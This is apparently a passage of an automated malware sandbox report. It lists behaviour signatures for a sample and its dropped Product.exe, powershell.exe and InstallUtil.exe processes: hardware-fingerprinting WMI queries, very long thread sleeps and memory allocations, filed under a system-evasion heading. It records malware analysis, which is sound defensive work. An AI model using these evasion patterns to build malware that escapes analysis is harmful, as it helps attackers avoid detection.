                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\MethodSignature\dhrzb\Product.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\MethodSignature\dhrzb\Product.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\MethodSignature\dhrzb\Product.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\MethodSignature\dhrzb\Product.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\MethodSignature\dhrzb\Product.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\MethodSignature\dhrzb\Product.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\MethodSignature\dhrzb\Product.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\MethodSignature\dhrzb\Product.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\MethodSignature\dhrzb\Product.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\MethodSignature\dhrzb\Product.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\MethodSignature\dhrzb\Product.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\MethodSignature\dhrzb\Product.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\MethodSignature\dhrzb\Product.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\MethodSignature\dhrzb\Product.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\MethodSignature\dhrzb\Product.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\MethodSignature\dhrzb\Product.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\MethodSignature\dhrzb\Product.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\MethodSignature\dhrzb\Product.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\MethodSignature\dhrzb\Product.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\MethodSignature\dhrzb\Product.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\MethodSignature\dhrzb\Product.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\MethodSignature\dhrzb\Product.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\MethodSignature\dhrzb\Product.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\MethodSignature\dhrzb\Product.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\MethodSignature\dhrzb\Product.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\MethodSignature\dhrzb\Product.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\MethodSignature\dhrzb\Product.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\MethodSignature\dhrzb\Product.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\MethodSignature\dhrzb\Product.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\MethodSignature\dhrzb\Product.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\MethodSignature\dhrzb\Product.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\MethodSignature\dhrzb\Product.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

                      Malware Analysis System Evasion

                      barindex
                      Source: Yara matchFile source: Process Memory Space: Product.exe PID: 5136, type: MEMORYSTR
                      Source: C:\Users\user\Desktop\test.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_DiskDrive
                      Source: C:\Users\user\Desktop\test.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_DiskDrive
                      Source: C:\Users\user\AppData\Local\MethodSignature\dhrzb\Product.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_DiskDrive
                      Source: C:\Users\user\AppData\Local\MethodSignature\dhrzb\Product.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_DiskDrive
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_DiskDrive
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_DiskDrive
                      Source: C:\Users\user\AppData\Local\MethodSignature\dhrzb\Product.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_DiskDrive
                      Source: C:\Users\user\AppData\Local\MethodSignature\dhrzb\Product.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_DiskDrive
                      Source: C:\Users\user\Desktop\test.exeMemory allocated: 2E70000 memory reserve | memory write watchJump to behavior
                      Source: C:\Users\user\Desktop\test.exeMemory allocated: 30B0000 memory reserve | memory write watchJump to behavior
                      Source: C:\Users\user\Desktop\test.exeMemory allocated: 2EF0000 memory reserve | memory write watchJump to behavior
                      Source: C:\Users\user\AppData\Local\MethodSignature\dhrzb\Product.exeMemory allocated: 2F20000 memory reserve | memory write watchJump to behavior
                      Source: C:\Users\user\AppData\Local\MethodSignature\dhrzb\Product.exeMemory allocated: 31A0000 memory reserve | memory write watchJump to behavior
                      Source: C:\Users\user\AppData\Local\MethodSignature\dhrzb\Product.exeMemory allocated: 2F20000 memory reserve | memory write watchJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeMemory allocated: FE0000 memory reserve | memory write watchJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeMemory allocated: 2A70000 memory reserve | memory write watchJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeMemory allocated: 4A70000 memory reserve | memory write watchJump to behavior
                      Source: C:\Users\user\AppData\Local\MethodSignature\dhrzb\Product.exeMemory allocated: F80000 memory reserve | memory write watchJump to behavior
                      Source: C:\Users\user\AppData\Local\MethodSignature\dhrzb\Product.exeMemory allocated: 28F0000 memory reserve | memory write watchJump to behavior
                      Source: C:\Users\user\AppData\Local\MethodSignature\dhrzb\Product.exeMemory allocated: 4A30000 memory reserve | memory write watchJump to behavior
                      Source: C:\Users\user\Desktop\test.exeThread delayed: delay time: 922337203685477Jump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                      Source: C:\Users\user\AppData\Local\MethodSignature\dhrzb\Product.exeThread delayed: delay time: 922337203685477Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 922337203685477Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 438000Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 337000Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 464000Jump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                      Source: C:\Users\user\AppData\Local\MethodSignature\dhrzb\Product.exeThread delayed: delay time: 922337203685477Jump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 6882Jump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 2819Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeWindow / User API: threadDelayed 5380Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeWindow / User API: threadDelayed 4440Jump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 6735
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 2867
                      Source: C:\Users\user\Desktop\test.exe TID: 4944Thread sleep time: -922337203685477s >= -30000sJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6416Thread sleep count: 6882 > 30Jump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 4424Thread sleep count: 2819 > 30Jump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3060Thread sleep time: -8301034833169293s >= -30000sJump to behavior
                      Source: C:\Users\user\AppData\Local\MethodSignature\dhrzb\Product.exe TID: 5672Thread sleep time: -922337203685477s >= -30000sJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 3388Thread sleep count: 39 > 30Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 3388Thread sleep time: -35971150943733603s >= -30000sJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 3388Thread sleep time: -60000s >= -30000sJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 5496Thread sleep count: 5380 > 30Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 3388Thread sleep time: -59859s >= -30000sJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 5496Thread sleep count: 4440 > 30Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 3388Thread sleep time: -59735s >= -30000sJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 3388Thread sleep time: -59610s >= -30000sJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 3388Thread sleep time: -59485s >= -30000sJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 3388Thread sleep time: -59360s >= -30000sJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 3388Thread sleep time: -59189s >= -30000sJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 3388Thread sleep time: -59063s >= -30000sJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 3388Thread sleep time: -58898s >= -30000sJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 3388Thread sleep time: -58791s >= -30000sJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 3388Thread sleep time: -58641s >= -30000sJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 3388Thread sleep time: -58511s >= -30000sJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 3388Thread sleep time: -58407s >= -30000sJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 3388Thread sleep time: -58266s >= -30000sJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 6236Thread sleep time: -438000s >= -30000sJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 3388Thread sleep time: -59889s >= -30000sJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 3388Thread sleep time: -59781s >= -30000sJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 3388Thread sleep time: -59658s >= -30000sJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 3388Thread sleep time: -59532s >= -30000sJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 3388Thread sleep time: -59407s >= -30000sJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 3388Thread sleep time: -59281s >= -30000sJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 3388Thread sleep time: -59166s >= -30000sJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 3388Thread sleep time: -59061s >= -30000sJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 3388Thread sleep time: -58953s >= -30000sJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 3388Thread sleep time: -58844s >= -30000sJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 3388Thread sleep time: -58735s >= -30000sJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 3388Thread sleep time: -58610s >= -30000sJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 3388Thread sleep time: -58485s >= -30000sJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 3388Thread sleep time: -58360s >= -30000sJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 6236Thread sleep time: -337000s >= -30000sJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 3388Thread sleep time: -59875s >= -30000sJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 3388Thread sleep time: -59766s >= -30000sJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 3388Thread sleep time: -59641s >= -30000sJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 3388Thread sleep time: -59516s >= -30000sJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 3388Thread sleep time: -59406s >= -30000sJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 3388Thread sleep time: -59297s >= -30000sJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 3388Thread sleep time: -59187s >= -30000sJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 3388Thread sleep time: -59058s >= -30000sJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 3388Thread sleep time: -58948s >= -30000sJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 3388Thread sleep time: -58827s >= -30000sJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 3388Thread sleep time: -58719s >= -30000sJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 3388Thread sleep time: -58609s >= -30000sJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 3388Thread sleep time: -58500s >= -30000sJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 3388Thread sleep time: -58391s >= -30000sJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 3388Thread sleep time: -58281s >= -30000sJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 6236Thread sleep time: -464000s >= -30000sJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 3388Thread sleep time: -59874s >= -30000sJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 3388Thread sleep time: -59765s >= -30000sJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 3388Thread sleep time: -59656s >= -30000sJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 3388Thread sleep time: -59546s >= -30000sJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 3388Thread sleep time: -59432s >= -30000sJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 3388Thread sleep time: -59327s >= -30000sJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6312Thread sleep count: 6735 > 30
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6200Thread sleep count: 2867 > 30
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5380Thread sleep time: -11068046444225724s >= -30000s
                      Source: C:\Users\user\AppData\Local\MethodSignature\dhrzb\Product.exe TID: 6016Thread sleep time: -922337203685477s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\test.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard
                      Source: C:\Users\user\AppData\Local\MethodSignature\dhrzb\Product.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard
                      Source: C:\Users\user\AppData\Local\MethodSignature\dhrzb\Product.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard
                      Source: C:\Users\user\Desktop\test.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                      Source: C:\Users\user\AppData\Local\MethodSignature\dhrzb\Product.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                      Source: C:\Users\user\AppData\Local\MethodSignature\dhrzb\Product.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                      Source: C:\Users\user\Desktop\test.exeThread delayed: delay time: 922337203685477Jump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                      Source: C:\Users\user\AppData\Local\MethodSignature\dhrzb\Product.exeThread delayed: delay time: 922337203685477Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 922337203685477Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 60000Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 59859Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 59735Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 59610Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 59485Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 59360Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 59189Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 59063Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 58898Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 58791Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 58641Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 58511Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 58407Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 58266Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 438000Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 59889Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 59781Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 59658Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 59532Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 59407Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 59281Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 59166Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 59061Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 58953Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 58844Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 58735Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 58610Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 58485Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 58360Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 337000Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 59875Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 59766Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 59641Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 59516Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 59406Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 59297Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 59187Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 59058Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 58948Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 58827Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 58719Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 58609Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 58500Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 58391Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 58281Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 464000Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 59874Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 59765Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 59656Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 59546Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 59432Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 59327Jump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                      Source: C:\Users\user\AppData\Local\MethodSignature\dhrzb\Product.exeThread delayed: delay time: 922337203685477Jump to behavior
                      Source: InstallUtil.exe, 00000005.00000002.2742988264.0000000005590000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllstringHeight
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information queried: ProcessInformationJump to behavior
